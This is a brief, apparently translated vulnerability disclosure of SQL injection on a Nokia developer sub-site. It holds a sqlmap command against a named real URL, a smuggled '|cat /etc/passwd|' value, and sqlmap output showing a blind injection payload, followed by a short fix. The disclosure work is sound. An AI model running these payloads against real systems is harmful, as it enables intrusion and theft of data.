SQL Injection on a Nokia sub-site involves 1620 tables and 0.4 million data.
A batch vulnerability scanner is built ~~ Initial scan
Really Useful ~
The specific data is not run, that is, the table name.
Competition, high score
Injection point:
python sqlmap.py -u "http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" --tables --thread 3
[15:08:58] [INFO] resuming back-end DBMS 'oracle'[15:08:58] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: user_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: user_id=1) AND 7908=7908 AND (4640=4640&file=|cat /etc/passwd|---[15:08:59] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle
Sensitive data
Solution:
Pre-compiled SQL statements and parameterized SQL statements.
It is better to add a parameter filter to the access interface.